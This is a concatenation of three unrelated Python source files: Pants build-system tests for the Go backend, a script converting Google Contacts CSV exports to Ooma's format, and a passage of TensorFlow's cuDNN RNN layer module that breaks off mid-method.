# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os.path
from textwrap import dedent
import pytest
from pants.backend.go import target_type_rules
from pants.backend.go.target_type_rules import (
GenerateTargetsFromGoModRequest,
InferGoPackageDependenciesRequest,
InjectGoBinaryMainDependencyRequest,
)
from pants.backend.go.target_types import (
GoBinaryMainPackage,
GoBinaryMainPackageField,
GoBinaryMainPackageRequest,
GoBinaryTarget,
GoFirstPartyPackageSourcesField,
GoFirstPartyPackageSubpathField,
GoFirstPartyPackageTarget,
GoImportPathField,
GoModTarget,
GoThirdPartyModulePathField,
GoThirdPartyModuleVersionField,
GoThirdPartyPackageTarget,
)
from pants.backend.go.util_rules import first_party_pkg, go_mod, sdk, third_party_pkg
from pants.base.exceptions import ResolveError
from pants.build_graph.address import Address
from pants.core.target_types import GenericTarget
from pants.engine.addresses import Addresses
from pants.engine.rules import QueryRule
from pants.engine.target import (
Dependencies,
DependenciesRequest,
GeneratedTargets,
InferredDependencies,
InjectedDependencies,
InvalidFieldException,
InvalidTargetException,
)
from pants.testutil.rule_runner import RuleRunner, engine_error
from pants.util.ordered_set import FrozenOrderedSet
# -----------------------------------------------------------------------------------------------
# Dependency inference
# -----------------------------------------------------------------------------------------------
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*go_mod.rules(),
*first_party_pkg.rules(),
*third_party_pkg.rules(),
*sdk.rules(),
*target_type_rules.rules(),
QueryRule(Addresses, [DependenciesRequest]),
QueryRule(GoBinaryMainPackage, [GoBinaryMainPackageRequest]),
QueryRule(InjectedDependencies, [InjectGoBinaryMainDependencyRequest]),
],
target_types=[GoModTarget, GoBinaryTarget, GenericTarget],
)
rule_runner.set_options([], env_inherit={"PATH"})
return rule_runner
def test_go_package_dependency_inference(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod()",
"foo/go.mod": dedent(
"""\
module go.example.com/foo
go 1.17
require github.com/google/go-cmp v0.4.0
"""
),
"foo/go.sum": dedent(
"""\
github.com/google/go-cmp v0.4.0 h1:xsAVV57WRhGj6kEIi8ReJzQlHHqcBYCElAvkovg3B/4=
github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543 h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
"""
),
"foo/pkg/foo.go": dedent(
"""\
package pkg
import "github.com/google/go-cmp/cmp"
func grok(left, right string) bool {
return cmp.Equal(left, right)
}
"""
),
"foo/cmd/main.go": dedent(
"""\
package main
import (
"fmt"
"go.example.com/foo/pkg"
)
func main() {
fmt.Printf("%s\n", pkg.Grok())
}"""
),
}
)
tgt1 = rule_runner.get_target(Address("foo", generated_name="./cmd"))
inferred_deps1 = rule_runner.request(
InferredDependencies,
[InferGoPackageDependenciesRequest(tgt1[GoFirstPartyPackageSourcesField])],
)
assert inferred_deps1.dependencies == FrozenOrderedSet([Address("foo", generated_name="./pkg")])
tgt2 = rule_runner.get_target(Address("foo", generated_name="./pkg"))
inferred_deps2 = rule_runner.request(
InferredDependencies,
[InferGoPackageDependenciesRequest(tgt2[GoFirstPartyPackageSourcesField])],
)
assert inferred_deps2.dependencies == FrozenOrderedSet(
[Address("foo", generated_name="github.com/google/go-cmp/cmp")]
)
# -----------------------------------------------------------------------------------------------
# Generate package targets from `go_mod`
# -----------------------------------------------------------------------------------------------
def test_generate_package_targets(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/go/BUILD": "go_mod()\n",
"src/go/go.mod": dedent(
"""\
module example.com/src/go
go 1.17
require (
github.com/google/go-cmp v0.4.0
github.com/google/uuid v1.2.0
)
"""
),
"src/go/go.sum": dedent(
"""\
github.com/google/go-cmp v0.4.0 h1:xsAVV57WRhGj6kEIi8ReJzQlHHqcBYCElAvkovg3B/4=
github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
github.com/google/uuid v1.2.0 h1:qJYtXnJRWmpe7m/3XlyhrsLrEURqHRM2kxzoxXqyUDs=
github.com/google/uuid v1.2.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543 h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
"""
),
"src/go/hello.go": "",
"src/go/subdir/f.go": "",
"src/go/subdir/f2.go": "",
"src/go/another_dir/subdir/f.go": "",
}
)
generator = rule_runner.get_target(Address("src/go"))
generated = rule_runner.request(GeneratedTargets, [GenerateTargetsFromGoModRequest(generator)])
def gen_first_party_tgt(rel_dir: str, sources: list[str]) -> GoFirstPartyPackageTarget:
return GoFirstPartyPackageTarget(
{
GoImportPathField.alias: (
os.path.join("example.com/src/go", rel_dir) if rel_dir else "example.com/src/go"
),
GoFirstPartyPackageSubpathField.alias: rel_dir,
GoFirstPartyPackageSourcesField.alias: tuple(sources),
},
Address("src/go", generated_name=f"./{rel_dir}"),
)
def gen_third_party_tgt(
mod_path: str, version: str, import_path: str
) -> GoThirdPartyPackageTarget:
return GoThirdPartyPackageTarget(
{
GoImportPathField.alias: import_path,
GoThirdPartyModulePathField.alias: mod_path,
GoThirdPartyModuleVersionField.alias: version,
},
Address("src/go", generated_name=import_path),
)
expected = GeneratedTargets(
generator,
{
gen_first_party_tgt("", ["hello.go"]),
gen_first_party_tgt("subdir", ["subdir/f.go", "subdir/f2.go"]),
gen_first_party_tgt("another_dir/subdir", ["another_dir/subdir/f.go"]),
gen_third_party_tgt("github.com/google/uuid", "v1.2.0", "github.com/google/uuid"),
gen_third_party_tgt(
"github.com/google/go-cmp", "v0.4.0", "github.com/google/go-cmp/cmp"
),
gen_third_party_tgt(
"github.com/google/go-cmp", "v0.4.0", "github.com/google/go-cmp/cmp/cmpopts"
),
gen_third_party_tgt(
"github.com/google/go-cmp", "v0.4.0", "github.com/google/go-cmp/cmp/internal/diff"
),
gen_third_party_tgt(
"github.com/google/go-cmp", "v0.4.0", "github.com/google/go-cmp/cmp/internal/flags"
),
gen_third_party_tgt(
"github.com/google/go-cmp",
"v0.4.0",
"github.com/google/go-cmp/cmp/internal/function",
),
gen_third_party_tgt(
"github.com/google/go-cmp",
"v0.4.0",
"github.com/google/go-cmp/cmp/internal/testprotos",
),
gen_third_party_tgt(
"github.com/google/go-cmp",
"v0.4.0",
"github.com/google/go-cmp/cmp/internal/teststructs",
),
gen_third_party_tgt(
"github.com/google/go-cmp", "v0.4.0", "github.com/google/go-cmp/cmp/internal/value"
),
gen_third_party_tgt(
"golang.org/x/xerrors", "v0.0.0-20191204190536-9bdfabe68543", "golang.org/x/xerrors"
),
gen_third_party_tgt(
"golang.org/x/xerrors",
"v0.0.0-20191204190536-9bdfabe68543",
"golang.org/x/xerrors/internal",
),
},
)
assert list(generated.keys()) == list(expected.keys())
for addr, tgt in generated.items():
assert tgt == expected[addr]
def test_package_targets_cannot_be_manually_created() -> None:
with pytest.raises(InvalidTargetException):
GoFirstPartyPackageTarget(
{GoImportPathField.alias: "foo", GoFirstPartyPackageSubpathField.alias: "foo"},
Address("foo"),
)
with pytest.raises(InvalidTargetException):
GoThirdPartyPackageTarget(
{
GoImportPathField.alias: "foo",
GoThirdPartyModulePathField.alias: "foo",
GoThirdPartyModuleVersionField.alias: "foo",
},
Address("foo"),
)
# -----------------------------------------------------------------------------------------------
# The `main` field for `go_binary`
# -----------------------------------------------------------------------------------------------
def test_determine_main_pkg_for_go_binary(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"go.mod": dedent(
"""\
module example.com/foo
go 1.17
"""
),
"BUILD": "go_mod(name='mod')",
"explicit/f.go": "",
"explicit/BUILD": "go_binary(main='//:mod#./explicit')",
"inferred/f.go": "",
"inferred/BUILD": "go_binary()",
"ambiguous/f.go": "",
"ambiguous/go.mod": dedent(
"""\
module example.com/ambiguous
go 1.17
"""
),
"ambiguous/BUILD": "go_binary()",
# Note there are no `.go` files in this dir, so no package targets will be created.
"missing/BUILD": "go_binary()",
"explicit_wrong_type/BUILD": dedent(
"""\
target(name='dep')
go_binary(main=':dep')
"""
),
}
)
def get_main(addr: Address) -> Address:
tgt = rule_runner.get_target(addr)
main_addr = rule_runner.request(
GoBinaryMainPackage, [GoBinaryMainPackageRequest(tgt[GoBinaryMainPackageField])]
).address
injected_addresses = rule_runner.request(
InjectedDependencies, [InjectGoBinaryMainDependencyRequest(tgt[Dependencies])]
)
assert [main_addr] == list(injected_addresses)
return main_addr
assert get_main(Address("explicit")) == Address(
"", target_name="mod", generated_name="./explicit"
)
assert get_main(Address("inferred")) == Address(
"", target_name="mod", generated_name="./inferred"
)
with engine_error(ResolveError, contains="none were found"):
get_main(Address("missing"))
with engine_error(ResolveError, contains="There are multiple `go_first_party_package` targets"):
get_main(Address("ambiguous"))
with engine_error(
InvalidFieldException, contains="must point to a `go_first_party_package` target"
):
get_main(Address("explicit_wrong_type"))
|
|
from __future__ import print_function
import sys
import csv
def warning(*objs):
print("WARNING:", *objs, file=sys.stderr)
def error(*objs):
print("ERROR:", *objs, file=sys.stderr)
def fatal(*objs):
print("FATAL:", *objs, file=sys.stderr)
sys.exit(1)
if len(sys.argv) != 3:
sys.exit("Usage: " + sys.argv[0] + " input.csv output.txt")
infile = sys.argv[1]
outfile = sys.argv[2]
# fields in ooma contact export csv file
ofields = [
"Title",
"First Name",
"Middle Name",
"Last Name",
"Suffix",
"Company",
"Department",
"Job",
"Title (duplicate)",
"Business Street",
"Business Street 2",
"Business Street 3",
"Business City",
"Business State",
"Business Postal Code",
"Business Country/Region",
"Home Street",
"Home Street 2",
"Home Street 3",
"Home City",
"Home State",
"Home Postal Code",
"Home Country/Region",
"Other Street",
"Other Street 2",
"Other Street 3",
"Other City",
"Other State",
"Other Postal Code",
"Other Country/Region",
"Assistant's Phone",
"Business Fax",
"Business Phone",
"Business Phone 2",
"Callback",
"Car Phone",
"Company Main Phone",
"Home Fax",
"Home Phone",
"Home Phone 2",
"ISDN",
"Mobile Phone",
"Other Fax",
"Other Phone",
"Pager",
"Primary Phone",
"Radio Phone",
"TTY/TDD Phone",
"Telex",
"Account",
"Anniversary",
"Assistant's Name",
"Billing Information",
"Birthday",
"Business Address PO Box",
"Categories",
"Children",
"Directory Server",
"E-mail Address",
"E-mail Type",
"E-mail Display Name",
"E-mail 2 Address",
"E-mail 2 Type",
"E-mail 2 Display Name",
"E-mail 3 Address",
"E-mail 3 Type",
"E-mail 3 Display Name",
"Gender",
"Government ID Number",
"Hobby",
"Home Address PO Box",
"Initials",
"Internet Free Busy",
"Keywords",
"Language",
"Location",
"Manager's Name",
"Mileage",
"Notes",
"Office Location",
"Organizational ID Number",
"Other Address PO Box",
"Priority",
"Private",
"Profession",
"Referred By",
"Sensitivity",
"Spouse",
"User 1",
"User 2",
"User 3",
"User 4",
"Web Page",
]
omap = {}
# map of field name to index number in output array
for k, v in enumerate(ofields):
omap[v] = k
otitle_index = omap['Title']
ofirst_index = omap['First Name']
olast_index = omap['Last Name']
# map of google field name to ooma output field name
go_map = {
'Name': 'Title',
'Given Name': 'First Name',
'Family Name': 'Last Name',
'Organization 1 - Name': 'Company',
}
# map of google phone type value to ooma output field name
gtype_map = {
'Custom': 'Other Phone',
'Google Voice': 'Other Phone',
'Home Fax': 'Other Fax',
'Home': 'Home Phone',
'Main': "Primary Phone",
'Mobile': 'Mobile Phone',
'Other': 'Other Phone',
'Pager': 'Pager',
'Work Fax': 'Business Fax',
'Work': 'Business Phone',
}
out = '"' + '","'.join(ofields) + '"' + "\n"
gmap = {}
header = False
line_no = 0
with open(infile, 'rb') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
line_no = line_no + 1
if not header:
gfields = row
for k, v in enumerate(gfields):
gmap[v] = k
header = True
continue
output = [''] * len(ofields)
for gname, oname in go_map.items():
if not gmap.has_key(gname):
fatal(infile, ': does not contain field', '"' + gname + '"')
gindex = gmap[gname]
oindex = omap[oname]
output[oindex] = row[gindex]
if output[ofirst_index] == '' and output[olast_index] == '':
if not gmap.has_key('Organization 1 - Name'):
fatal(infile, ': does not contain field "Organization 1 - Name"')
gindex = gmap["Organization 1 - Name"]
company = row[gindex]
if output[otitle_index] == '':
output[otitle_index] = company
parts = company.split(' ')
first = ''
last = ''
for part in parts:
if first > '':
sp = ' '
else:
sp = ''
if len(first) + len(part) + len(sp) <= 15:
first = first + sp + part
else:
if last > '':
sp = ' '
else:
sp = ''
last = last + sp + part
output[ofirst_index] = first
output[olast_index] = last
phones_found = 0
for no in range(1, 20):
gtype_name = 'Phone %d - Type' % (no)
if not gmap.has_key(gtype_name):
break
gvalue_name = 'Phone %d - Value' % (no)
if not gmap.has_key(gvalue_name):
error(infile, ': line', line_no, ': phone', no, ': does not contain field: ', '"' + gvalue_name + '":', output[0])
continue
gtype_index = gmap[gtype_name]
gvalue_index = gmap[gvalue_name]
field = row[gvalue_index].strip()
if field == '':
continue
gtype = row[gtype_index]
if gtype_map.has_key(gtype):
ofield = gtype_map[gtype]
else:
error(infile, ': line', line_no, ': phone', no, ': unknown phone type:', '"' + gtype + '", using "Other Phone":', output[0])
ofield = 'Other Phone'
phones = field.split(':::')
# @todo process other phone numbers?
phone0 = phones[0].strip()
new = ''
if phone0[0:2] == '+1':
phone0 = phone0[2:]
for c in phone0:
if len(new) == 0 and c == '+':
new += c
continue
if '0123456789'.find(c) >= 0:
new += c
continue
if "-().".find(c) >= 0:
continue
if " \t".find(c) >= 0:
continue
if len(new) > 10:
break;
if len(new) == 0:
warning(infile, ': line', line_no, ': phone', no, gtype, ': no phone number found:', output[0])
continue
oindex = omap[ofield]
if phones_found < 4:
output[oindex] = new
else:
error(infile, ': line', line_no, ': phone', no, gtype, new, ': ignoring number, as Ooma has a 4 phone number limit:', output[0])
phones_found += 1
if phones_found == 0:
continue
out += '"' + ('","'.join(output)) + '"' + "\n"
with open(outfile, 'wb') as fp:
fp.write(out)
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Cudnn RNN operators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.cudnn_rnn.python.ops import cudnn_rnn_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base as base_layer
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.platform import tf_logging as logging
CUDNN_RNN_UNIDIRECTION = cudnn_rnn_ops.CUDNN_RNN_UNIDIRECTION
CUDNN_RNN_BIDIRECTION = cudnn_rnn_ops.CUDNN_RNN_BIDIRECTION
CUDNN_LSTM = cudnn_rnn_ops.CUDNN_LSTM
CUDNN_GRU = cudnn_rnn_ops.CUDNN_GRU
CUDNN_RNN_RELU = cudnn_rnn_ops.CUDNN_RNN_RELU
CUDNN_RNN_TANH = cudnn_rnn_ops.CUDNN_RNN_TANH
# Half for cell input, half for hidden states.
CUDNN_LSTM_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_LSTM_PARAMS_PER_LAYER
CUDNN_GRU_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_GRU_PARAMS_PER_LAYER
CUDNN_RNN_TANH_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_RNN_TANH_PARAMS_PER_LAYER
CUDNN_RNN_RELU_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_RNN_RELU_PARAMS_PER_LAYER
CUDNN_INPUT_LINEAR_MODE = cudnn_rnn_ops.CUDNN_INPUT_LINEAR_MODE
CUDNN_INPUT_SKIP_MODE = cudnn_rnn_ops.CUDNN_INPUT_SKIP_MODE
CUDNN_INPUT_AUTO_MODE = cudnn_rnn_ops.CUDNN_INPUT_AUTO_MODE
__all__ = ["CudnnLSTM", "CudnnGRU", "CudnnRNNTanh", "CudnnRNNRelu"]
class _CudnnRNN(base_layer.Layer):
# pylint:disable=line-too-long
"""Abstract class for RNN layers with Cudnn implementation.
Cudnn RNNs have two major differences from other platform-independent RNNs tf
provides:
* Cudnn LSTM and GRU are mathematically different from their tf counterparts.
(e.g. @{tf.contrib.rnn.LSTMBlockCell} and @{tf.nn.rnn_cell.GRUCell}.
* Cudnn-trained checkpoints are not directly compatible with tf RNNs:
* They use a single opaque parameter buffer for the entire (possibly)
multi-layer multi-directional RNN; Whereas tf RNN weights are per-cell and
layer.
* The size and layout of the parameter buffers may change between
CUDA/CuDNN/GPU generations. Because of that, the opaque parameter variable
does not have a static shape and is not partitionable. Instead of using
partitioning to alleviate the PS's traffic load, try building a
multi-tower model and do gradient aggregation locally within the host
before updating the PS. See https://www.tensorflow.org/performance/performance_models#parameter_server_variables
for a detailed performance guide.
Consequently, if one plans to use Cudnn trained models on both GPU and CPU
for inference and training, one needs to:
* Create a CudnnOpaqueParamsSaveable subclass object to save RNN params in
canonical format. (This is done for you automatically during layer building
process.)
* When not using a Cudnn RNN class, use CudnnCompatibleRNN classes to load the
checkpoints. These classes are platform-independent and perform the same
computation as Cudnn for training and inference.
Similarly, CudnnCompatibleRNN-trained checkpoints can be loaded by CudnnRNN
classes seamlessly.
Below is a typical workflow(using LSTM as an example):
for detailed performance guide.
# Use Cudnn-trained checkpoints with CudnnCompatibleRNNs
```python
with tf.Graph().as_default():
lstm = CudnnLSTM(num_layers, num_units, direction, ...)
outputs, output_states = lstm(inputs, initial_states, training=True)
# If user plans to delay calling the cell with inputs, one can do
# lstm.build(input_shape)
saver = Saver()
# training subgraph
...
# Once in a while save the model.
saver.save(save_path)
# Inference subgraph for unidirectional RNN on, e.g., CPU or mobile.
with tf.Graph().as_default():
single_cell = lambda: tf.contrib.cudnn_rnn.CudnnCompatibleLSTM(num_units)
# NOTE: Even if there's only one layer, the cell needs to be wrapped in
# MultiRNNCell.
cell = tf.nn.rnn_cell.MultiRNNCell(
[single_cell() for _ in range(num_layers)])
# Leave the scope arg unset.
outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, initial_state, ...)
saver = Saver()
# Create session
sess = ...
# Restores
saver.restore(sess, save_path)
# Inference subgraph for bidirectional RNN
with tf.Graph().as_default():
single_cell = lambda: tf.contrib.cudnn_rnn.CudnnCompatibleLSTM(num_units)
cells_fw = [single_cell() for _ in range(num_layers)]
cells_bw = [single_cell() for _ in range(num_layers)]
# Leave the scope arg unset.
(outputs, output_state_fw,
output_state_bw) = tf.contrib.rnn.stack_bidirectional_dynamic_rnn(
cells_fw, cells_bw, inputs, ...)
saver = Saver()
# Create session
sess = ...
# Restores
saver.restore(sess, save_path)
```
"""
# pylint:enable=line-too-long
# TODO(allenl): Document object-based saving and checkpoint compatibility once
# it's implemented for more cuDNN Layers.
# The following are constants defined by subclasses.
# Type of RNN cell.
_rnn_mode = None
# Number of cell weights(or biases) per layer.
_num_params_per_layer = None
# Custom SaveableObject class for the CudnnRNN class.
_saveable_cls = None
def __init__(self,
num_layers,
num_units,
input_mode=CUDNN_INPUT_LINEAR_MODE,
direction=CUDNN_RNN_UNIDIRECTION,
dropout=0.,
seed=None,
dtype=dtypes.float32,
kernel_initializer=None,
bias_initializer=None,
name=None):
"""Creates a CudnnRNN model from model spec.
Args:
num_layers: the number of layers for the RNN model.
num_units: the number of units within the RNN model.
input_mode: indicate whether there is a linear projection between the
input and the actual computation before the first layer. It can be
'linear_input', 'skip_input' or 'auto_select'.
'linear_input' (default) always applies a linear projection of input
onto RNN hidden state. (standard RNN behavior).
'skip_input' is only allowed when input_size == num_units;
'auto_select' implies 'skip_input' when input_size == num_units;
otherwise, it implies 'linear_input'.
direction: the direction model that the model operates. Can be either
'unidirectional' or 'bidirectional'
dropout: dropout rate, a number between [0, 1]. Dropout is applied between
each layer (no dropout is applied for a model with a single layer).
When set to 0, dropout is disabled.
seed: the op seed used for initializing dropout. See @{tf.set_random_seed}
for behavior.
dtype: tf.float16, tf.float32 or tf.float64
kernel_initializer: starting value to initialize the weight.
bias_initializer: starting value to initialize the bias
(default is all zeros).
name: VariableScope for the created subgraph; defaults to class name.
This only serves the default scope if later no scope is specified when
invoking __call__().
Raises:
ValueError: if direction is invalid. Or dtype is not supported.
"""
super(_CudnnRNN, self).__init__(dtype=dtype, name=name)
cudnn_rnn_ops.check_direction(direction)
cudnn_rnn_ops.check_input_mode(input_mode)
if dtype not in [dtypes.float16, dtypes.float32, dtypes.float64]:
raise ValueError(
"Only support float16, float32, float64, provided %s" % dtype)
# Layer self.dtype is type name, the original DType object is kept here.
self._plain_dtype = dtype
self._num_layers = num_layers
self._num_units = num_units
self._input_mode = input_mode
self._direction = direction
self._dropout = dropout
self._seed = seed
self._kernel_initializer = kernel_initializer
self._bias_initializer = bias_initializer
# Init input_size to None, which will be set after build().
self._input_size = None
self._saveable = None
@property
def num_layers(self):
return self._num_layers
@property
def num_units(self):
return self._num_units
@property
def input_mode(self):
"""Input mode of first layer.
Indicates whether there is a linear projection between the input and the
actual computation before the first layer. It can be
* 'linear_input': (default) always applies a linear projection of input
onto RNN hidden state. (standard RNN behavior)
* 'skip_input': 'skip_input' is only allowed when input_size == num_units.
* 'auto_select'. implies 'skip_input' when input_size == num_units;
otherwise, it implies 'linear_input'.
Returns:
'linear_input', 'skip_input' or 'auto_select'.
"""
return self._input_mode
@property
def input_size(self):
if not self._input_size:
raise ValueError(
"\'input_size\' is unknown since layer has not been built.")
return self._input_size
@property
def rnn_mode(self):
"""Type of RNN cell used.
Returns:
`lstm`, `gru`, `rnn_relu` or `rnn_tanh`.
"""
return self._rnn_mode
@property
def direction(self):
"""Returns `unidirectional` or `bidirectional`."""
return self._direction
@property
def num_dirs(self):
return 1 if self._direction == CUDNN_RNN_UNIDIRECTION else 2
@property
def saveable(self):
return self._saveable
@property
def canonical_weight_shapes(self):
"""Shapes of Cudnn canonical weight tensors."""
if not self._input_size:
raise RuntimeError(
"%s.canonical_weight_shapes invoked before input shape is known" %
type(self).__name__)
shapes = []
for i in range(self._num_layers):
shapes.extend(self._canonical_weight_shape(i))
return shapes
@property
def canonical_bias_shapes(self):
"""Shapes of Cudnn canonical bias tensors."""
return self._canonical_bias_shape(0) * self._num_layers
def _update_trainable_weights(self, getter, *args, **kwargs):
"""Custom getter for layer variables."""
# Add variables to layer's `(non_)trainable_weights` list(s).
variable = getter(*args, **kwargs)
trainable = kwargs.get("trainable", True)
if trainable and variable not in self._trainable_weights:
self._trainable_weights.append(variable)
elif not trainable and variable not in self._non_trainable_weights:
self._non_trainable_weights.append(variable)
return variable
def build(self, input_shape):
"""Create variables of the Cudnn RNN.
It can be called manually before `__call__()` or automatically through
`__call__()`. In the former case, subsequent `__call__()`s will skip
creating variables.
Args:
input_shape: network input tensor shape, a python list or a TensorShape
object with 3 dimensions.
Raises:
ValueError: if input_shape has wrong dimension or unknown 3rd dimension.
"""
if self.built:
return
input_shape = tensor_shape.TensorShape(input_shape)
if input_shape.ndims != 3:
raise ValueError("Expecting input_shape with 3 dims, got %d" %
input_shape.ndims)
if input_shape[-1].value is None:
raise ValueError("The last dimension of the inputs to `CudnnRNN` "
"should be defined. Found `None`.")
self._input_size = input_shape[-1].value
self.input_spec = base_layer.InputSpec(ndim=3, axes={-1: self._input_size})
self._set_scope(None)
# Not using base class `add_variable()` since the it calls
# `tf.get_variable()` with a callable initializer whereas here with a
# tensor. The difference is mandated to support forward-compatibility with
# Cudnn.
with vs.variable_scope(
self._scope,
reuse=self.built,
custom_getter=self._update_trainable_weights):
if self._kernel_initializer is None:
self._kernel_initializer = init_ops.glorot_uniform_initializer(
seed=self._seed, dtype=self._plain_dtype)
if self._bias_initializer is None:
self._bias_initializer = init_ops.constant_initializer(
0.0, dtype=self._plain_dtype)
weights = [
self._kernel_initializer(sp, dtype=self._plain_dtype)
for sp in self.canonical_weight_shapes
]
biases = [
self._bias_initializer(sp, dtype=self._plain_dtype)
for sp in self.canonical_bias_shapes
]
opaque_params_t = self._canonical_to_opaque(weights, biases)
if vs.get_variable_scope().partitioner is not None:
logging.warn(
"Partitioner is not supported for Cudnn RNN layer variables, using "
"it will create forward-compatibility issues with future "
"CUDA/CuDNN generations.")
# Initialize opaque params with a tensor.
self.kernel = vs.get_variable(
"opaque_kernel", initializer=opaque_params_t, validate_shape=False)
# Create saveable in the outer scope of the cudnn subgraph, such that
# alternative subgraph with platform-independent rnn cells can load the
# checkpoints directly.
if not (self.built or vs.get_variable_scope().reuse is True):
self._create_saveable()
self.built = True
def _gather_saveables_for_checkpoint(self):
raise NotImplementedError(
"This cell does not yet support object-based saving. File a feature "
"request if this limitation bothers you.")
def call(self, inputs, initial_state=None, training=True):
"""Runs the forward step for the RNN model.
Args:
inputs: `3-D` tensor with shape `[time_len, batch_size, input_size]`.
initial_state: a tuple of tensor(s) of shape
`[num_layers * num_dirs, batch_size, num_units]`. If not provided, use
zero initial states. The tuple size is 2 for LSTM and 1 for other RNNs.
training: whether this operation will be used in training or inference.
Returns:
output: a tensor of shape `[time_len, batch_size, num_dirs * num_units]`.
It is a `concat([fwd_output, bak_output], axis=2)`.
output_states: a tuple of tensor(s) of the same shape and structure as
`initial_state`.
Raises:
ValueError: initial_state is not a tuple.
"""
if initial_state is not None and not isinstance(initial_state, tuple):
raise ValueError("Invalid initial_state type: %s, expecting tuple.",
type(initial_state))
dtype = self.dtype
inputs = ops.convert_to_tensor(inputs, dtype=dtype)
batch_size = array_ops.shape(inputs)[1]
if initial_state is None:
initial_state = self._zero_state(batch_size)
if self._rnn_mode == CUDNN_LSTM:
h, c = initial_state # pylint:disable=unbalanced-tuple-unpacking,unpacking-non-sequence
else:
h, = initial_state # pylint:disable=unbalanced-tuple-unpacking,unpacking-non-sequence
h = ops.convert_to_tensor(h, dtype=dtype)
if self._rnn_mode == CUDNN_LSTM:
c = ops.convert_to_tensor(c, dtype=dtype)
else:
# For model that doesn't take input_c, replace with a dummy tensor.
c = array_ops.constant([], dtype=dtype)
outputs, (output_h, output_c) = self._forward(inputs, h, c, self.kernel,
training)
if self._rnn_mode == CUDNN_LSTM:
return outputs, (output_h, output_c)
else:
return outputs, (output_h,)
def state_shape(self, batch_size):
raise NotImplementedError
def _zero_state(self, batch_size):
res = []
for sp in self.state_shape(batch_size):
res.append(array_ops.zeros(sp, dtype=self.dtype))
return tuple(res)
def _canonical_weight_shape(self, layer):
"""Shapes of Cudnn canonical weight tensors for given layer."""
if layer < 0 or layer >= self._num_layers:
raise ValueError("\'layer\' is not valid, got %s, expecting [%d, %d]" %
(layer, 0, self._num_layers-1))
if not self._input_size:
raise RuntimeError(
"%s._canonical_weight_shape invoked before input shape is known" %
type(self).__name__)
input_size = self._input_size
num_units = self._num_units
num_gates = self._num_params_per_layer // 2
is_bidi = self._direction == CUDNN_RNN_BIDIRECTION
if layer == 0:
wts_applied_on_inputs = [(num_units, input_size)] * num_gates
else:
if is_bidi:
wts_applied_on_inputs = [(num_units, 2 * num_units)] * num_gates
else:
wts_applied_on_inputs = [(num_units, num_units)] * num_gates
wts_applied_on_hidden_states = [(num_units, num_units)] * num_gates
tf_wts = wts_applied_on_inputs + wts_applied_on_hidden_states
return tf_wts if not is_bidi else tf_wts * 2
def _canonical_bias_shape(self, unused_layer):
"""Shapes of Cudnn canonical bias tensors for given layer."""
num_dirs = 1 if self._direction == CUDNN_RNN_UNIDIRECTION else 2
return [[self._num_units]] * num_dirs * self._num_params_per_layer
def _canonical_to_opaque(self, cu_weights, cu_biases):
if not self._input_size:
raise RuntimeError(
"%s._canonical_to_opaque invoked before input shape is known" %
type(self).__name__)
with ops.device("/gpu:0"):
return cudnn_rnn_ops.cudnn_rnn_canonical_to_opaque_params(
rnn_mode=self._rnn_mode,
num_layers=self._num_layers,
num_units=self._num_units,
input_size=self._input_size,
weights=cu_weights,
biases=cu_biases,
input_mode=self._input_mode,
seed=self._seed,
dropout=self._dropout,
direction=self._direction)
def _forward(self, inputs, h, c, opaque_params, training):
output, output_h, output_c = cudnn_rnn_ops._cudnn_rnn( # pylint:disable=protected-access
inputs,
h,
c,
opaque_params,
training,
self._rnn_mode,
input_mode=self._input_mode,
direction=self._direction,
dropout=self._dropout,
seed=self._seed)
return output, (output_h, output_c)
def _create_saveable(self):
"""Create custom saveable for the Cudnn layer.
Called during layer building process to make sharing checkpoints between
Cudnn and Cudnn-compatible RNNs easy.
Returns:
a `CudnnOpaqueParamsSaveable` object.
Raises:
RuntimeError: if any custom saveable is already created for this layer.
"""
if self._saveable is not None:
raise RuntimeError("Cudnn saveable already created.")
self._saveable = self._saveable_cls( # pylint:disable=not-callable
opaque_params=self.trainable_variables[0],
num_layers=self.num_layers,
num_units=self.num_units,
input_size=self.input_size,
input_mode=self.input_mode,
direction=self.direction,
scope=vs.get_variable_scope(),
